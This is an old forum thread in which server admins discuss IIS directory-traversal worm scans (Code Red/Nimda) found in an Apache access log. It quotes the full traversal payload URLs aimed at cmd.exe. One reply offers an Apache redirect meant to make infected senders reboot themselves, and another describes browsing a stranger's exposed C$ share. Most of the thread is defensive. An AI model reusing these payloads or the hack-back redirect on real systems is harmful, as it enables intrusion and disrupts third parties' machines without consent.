# Strange logs in Apache

## qnx

Hi! I have something like this in my access_log (Apache) 

```
213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 313 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 329 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 295 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"

213.64.252.231 - - [29/Nov/2002:22:47:44 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
```

(It's just about 1% of my whole log....)

Now, I wonder if there is someone trying to crack me or it's just a IIS bug like Nmidia or something like that...

Any ideas?? Shall I care about this???

----------

## rac

It looks like an IIS worm to me.  You could try sending mail to abuse@telia.com - maybe they would be able to trace it.

----------

## darktux

qnx:

Don't worry about it, we all have to live with that   :Sad:   DAMN Microsoft  :Sad: 

----------

## qnx

Thanks, I just send my e-mail. Just just wonder where did you got that adress from??

----------

## bosje

Hi,

I had something quite similar. 2-3 times per hour my server was being probe by various servers infected with the Nimda virus. As long as you run apache you seem to be safe.

Mike

 *qnx wrote:*   

> Hi! I have something like this in my access_log (Apache) 
> 
> ```
> 213.64.252.231 - - [29/Nov/2002:22:47:43 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 296 "-" "-"
> 
> ...

 

----------

## qnx

 *darktux wrote:*   

> qnx:
> 
> Don't worry about it, we all have to live with that    DAMN Microsoft 

 

Well thanks, you can be sure that I'm not worried about it, I know that I'm unreachable for IIS worms in my safe Gentoo box =)

It's just that I installed apache+mysql+php for first time in my life and I'm a little bit suprised about thouse HUGE logs I get....Never expected so many visitors =)

----------

## qnx

 *bosje wrote:*   

> Hi,
> 
> I had something quite similar. 2-3 times per hour my server was being probe by various servers infected with the Nimda virus. As long as you run apache you seem to be safe.
> 
> Mike
> ...

 

When did you have it?? Today?? Can it be a new worm?? ohhh it would be sooooo funny if all IIS servers got infected once again by a nmida (can't spell it, argh!) based worm  :Very Happy: 

----------

## rac

 *qnx wrote:*   

> Just wonder where did you got that adress from??

 

It's a guess.  I hope it works.  Many ISPs have abuse@ addresses for reporting spamming, virus spreading, harrassment and other such anti-social activity.  If abuse@ doesn't work, postmaster@ is theoretically required to be deliverable at any domain.  As to how I chose telia, I ran "dig -x" on the IP address you listed in your log, and it came back with: 

```
231.252.64.213.in-addr.arpa. 86383 IN   PTR     h231n2fls31o920.telia.com.
```

----------

## qnx

Hmm...I don't have any "dig" ....Neither installed nor in emerge........It starts to sound stupid, but: where did you get it?

----------

## rac

net-dns/bind-tools

----------

## darktux

You can also use whois, just....

```
emerge whois
```

----------

## xpunkrockryanx

while it is common to get the "cmd.exe?"... requests on your web logs (result of code red/nimda activity), i dont think it's normal to be getting that many in a row from one single ip address (or at least i haven't seen it). while you're not going to be vulnerable to the types of attacks/probes you're seeing in that apache log, it might be a good idea to check your other logs for activity from the same ip. it might be that someone there is maliciously attempting to gain access to your system, so i'd say it's worth checking.

just my two cents anyway...  :Smile: 

-ryan

----------

## darktux

If that 1% referes to the same ip, then I'd care, if it's not... Just forget about it....

----------

## qnx

Acctually I found something in Samba's access_log. But since Samba is not working for me (I can't log-in from another computer, even if I enter root and my root password), I don't think that that person could do anything =) . Anyway, it wasn't the same IP, so those ones in Apache's access_log are just worms, I guess. 

But thanks for pointing this out!

----------

## petu

 *qnx wrote:*   

> Acctually I found something in Samba's access_log. But since Samba is not working for me (I can't log-in from another computer, even if I enter root and my root password), I don't think that that person could do anything =) . Anyway, it wasn't the same IP, so those ones in Apache's access_log are just worms, I guess. 
> 
> But thanks for pointing this out!

 

Are you offering samba to the bad internet? IMHO samba is a great service for trusted networks(behind firewalls) but one shouldn't offer it to global internet. Or if one offers it should be secured with ssh-tunnel or some other kind of vpn solution. Samba doesn't read user names and passwords from system files. If you want samba to working you need to use 

```
smbpasswd -a ${username}
```

 to add a user where ${username} is a valid username but no shell account is required.

But please do NOT offer samba service to internet!!

----------

## qnx

 *petu wrote:*   

> But please do NOT offer samba service to internet!!

 

Hmm....ok. Something like

```

hosts deny = ALL

hosts allow = 192.168.0.

```

in my smb.conf should make it I guess??? Blocks everything except everything under 192.168.0.x, does it??

----------

## petu

 *qnx wrote:*   

> 
> 
> hosts deny = ALL
> 
> hosts allow = 192.168.0.
> ...

 

Yes it blocks everything expect 192.168.0.0/255.255.255.0 network.

----------

## simulacrum

I've run a webserver for quite a while and am quite familiar with the logs above. They're Code Red II scans. Occassionally you'll see one end in a ton of N's, which are Code Red I scans. Annoying, but there's little you can do, so many people are unwittingly infected to this day, when Code Red hit over a year ago.

----------

## Exci

sorry some stupid idiot in my class posted that....

but wasn't there a iptables way to block it?

something with 'string'

----------

## qnx

 *Exci wrote:*   

> sorry some stupid idiot in my class posted that....
> 
> but wasn't there a iptables way to block it?
> 
> something with 'string'

 

That's right, there should be some way to block it using iptables and filtring HTTP_GET or something but since these requests still do no harm, I don't think that there's any need of doing this.

----------

## axxackall

Has anyone tried to redirect bad requests using something like:

```
<Location /scripts>

    Deny from all

    ErrorDocument 403 http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201

</Location>
```

Just found on slashdot, it promises to reboot the infected source of that worm.

----------

## prolific

hmm..

this is probably a person who is deliberetely using a scanning utility to find vulnerable IIS servers, so that he can use the Transvesal Vulnerability to setup an FTP Account on that server.. You have nothing to worry about, only Windows admins who are 2 stupid to patch their IIS have  2 worry about this.   :Very Happy: 

----------

## MasterRa

I noticed the same thing in my logs the other day. There was a lot of it, too.. from several different ip's, but most of them were on my same ISP.. I did some port scans on the first ip i noticed, and sure enough it was a windows 2000 server system. I looked around and found that it's probly the Code Red worm, as you guys mentioned before. I also noticed that it seems to lower all security settings on the system. That is, from a windows box i could do start->run type in \\the.ip, and i had access to the entire system. (ie, \\the.ip\c$, full read/write access)

Kind of odd.

I tried to warn the guy, but never got a response.. 

Oh well.

----------

## green sun

I see a ton of this stuff.. just on my ISP's network (business). Its amazing how many machines are infected with Code Red I/II/Nimda to this date...

If you are getting a ton of scans and are on a slow connection, then they are eating up some bandwidth on your machine.. I remember reading an article on setting up apache to return a response to these scans that made it stop scanning & wasting BW (esp if you serve out custom 404 error pages... think about it, if you have a 30k 404 page, you are chugging it out there every time one of those requests fails...)

Of course now that I take a second to look for it, I can't find a link to the article.. grr....

----------

## ryan83vt

http://www.psacake.com/web/eg.asp is pretty useful - Reverse IP lookup w/ lots of info like contact information for that domain, without installing a program.

----------

## zawze

```
62.106.186.109 - - [02/Feb/2003:13:50:01 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 318 "-" "-"

```

Just one of some similar requests in my apache2 log. Try to visit http://62.106.186.109/ and a french(?) site for Windows NT 4.0 Options Pack occurs :)

----------

